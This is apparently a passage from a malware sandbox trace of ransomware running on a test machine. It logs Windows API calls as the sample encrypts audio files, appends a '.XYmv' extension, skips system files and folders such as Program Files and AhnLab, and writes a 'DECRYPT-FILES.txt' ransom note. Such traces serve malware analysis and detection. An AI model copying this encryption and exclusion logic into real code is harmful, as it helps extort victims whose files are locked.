halpmcxz\\music\\pnwitrglh_4la7ri\\x3cc3wvmpwy_49.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.498] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=94916) returned 1 [0085.498] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.498] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.498] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.499] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.499] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.499] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.517] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.517] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.518] CloseHandle (hObject=0x42c) returned 1 [0085.518] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.518] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.519] CloseHandle (hObject=0x0) returned 0 [0085.519] CloseHandle (hObject=0x428) returned 1 [0085.519] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.520] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.520] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.520] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav") returned 71 [0085.520] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav.XYmv") returned 76 [0085.520] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\x3cc3wvmpwy_49.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav.XYmv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\x3cc3wvmpwy_49.wav.xymv"), dwFlags=0x0) returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="autorun.inf") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="boot.ini") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="desktop.ini") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="ntuser.dat") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="iconcache.db") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="bootsect.bak") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="ntuser.dat.log") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="thumbs.db") returned 1 [0085.521] lstrcmpiW (lpString1="X9dYdVjiC9.mp3", lpString2="Bootfont.bin") returned 1 [0085.521] lstrlenW (lpString="X9dYdVjiC9.mp3") returned 14 [0085.521] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.521] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.521] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.522] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.522] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0085.522] lstrlenW (lpString="X9dYdVjiC9.mp3") returned 14 [0085.522] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0085.522] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="X9dYdVjiC9.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3" [0085.523] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.523] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.523] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.524] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.524] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.525] CloseHandle (hObject=0x0) returned 0 [0085.525] CloseHandle (hObject=0x428) returned 1 [0085.525] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.525] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3") returned 67 [0085.526] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3.XYmv") returned 72 [0085.526] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\x9dydvjic9.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3.XYmv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\x9dydvjic9.mp3.xymv"), dwFlags=0x0) returned 1 [0085.526] lstrcatW (in: lpString1="zmVkZ0mtR2bYJ", lpString2="\\" | out: lpString1="zmVkZ0mtR2bYJ\\") returned="zmVkZ0mtR2bYJ\\" [0085.526] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0085.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Program Files") returned 0x0 [0085.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch=":\\Windows") returned 0x0 [0085.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Games\\") returned 0x0 [0085.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\All Users") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="AhnLab") returned 0x0 [0085.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.527] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0085.527] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.527] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\jkbimi8.tmp") returned 79 [0085.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0085.529] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0085.529] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.529] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\DECRYPT-FILES.txt") returned 85 [0085.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0085.529] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0085.530] CloseHandle (hObject=0x42c) returned 1 [0085.530] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0085.530] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\*" [0085.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0447120, ftCreationTime.dwHighDateTime=0x1d4d2ed, ftLastAccessTime.dwLowDateTime=0xaf2bfc20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0085.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.530] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0447120, ftCreationTime.dwHighDateTime=0x1d4d2ed, ftLastAccessTime.dwLowDateTime=0xaf2bfc20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.530] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2bfc20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf2bfc20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.530] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.530] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2bfc20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf2bfc20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.530] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.531] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.531] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.531] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.531] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.531] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.531] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.531] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.531] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0085.531] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.531] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0085.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\jkbimi8.tmp" [0085.531] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.531] CloseHandle (hObject=0x0) returned 0 [0085.531] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.532] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28347f0, ftCreationTime.dwHighDateTime=0x1d4cc13, ftLastAccessTime.dwLowDateTime=0x912969a0, ftLastAccessTime.dwHighDateTime=0x1d4d21a, ftLastWriteTime.dwLowDateTime=0x912969a0, ftLastWriteTime.dwHighDateTime=0x1d4d21a, nFileSizeHigh=0x0, nFileSizeLow=0xcf82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LrBZvj2Te9U.wav", cAlternateFileName="LRBZVJ~1.WAV")) returned 1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="autorun.inf") returned 1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="boot.ini") returned 1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="desktop.ini") returned 1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="ntuser.dat") returned -1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="iconcache.db") returned 1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="bootsect.bak") returned 1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="ntuser.dat.log") returned -1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="thumbs.db") returned -1 [0085.532] lstrcmpiW (lpString1="LrBZvj2Te9U.wav", lpString2="Bootfont.bin") returned 1 [0085.532] lstrlenW (lpString="LrBZvj2Te9U.wav") returned 15 [0085.532] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.532] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.532] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.532] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0085.532] lstrlenW (lpString="LrBZvj2Te9U.wav") returned 15 [0085.532] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0085.532] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="LrBZvj2Te9U.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav" [0085.532] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\lrbzvj2te9u.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.533] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=53122) returned 1 [0085.533] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.533] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.533] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.533] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.533] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.533] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.534] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.535] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.535] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.536] CloseHandle (hObject=0x43c) returned 1 [0085.536] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.536] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.537] CloseHandle (hObject=0x0) returned 0 [0085.537] CloseHandle (hObject=0x438) returned 1 [0085.537] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.537] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.537] GetTickCount () returned 0x114dd74 [0085.537] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.538] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.538] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.538] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.538] lstrlenA (lpString="kernel32.dll") returned 12 [0085.538] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.538] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.538] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.538] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: 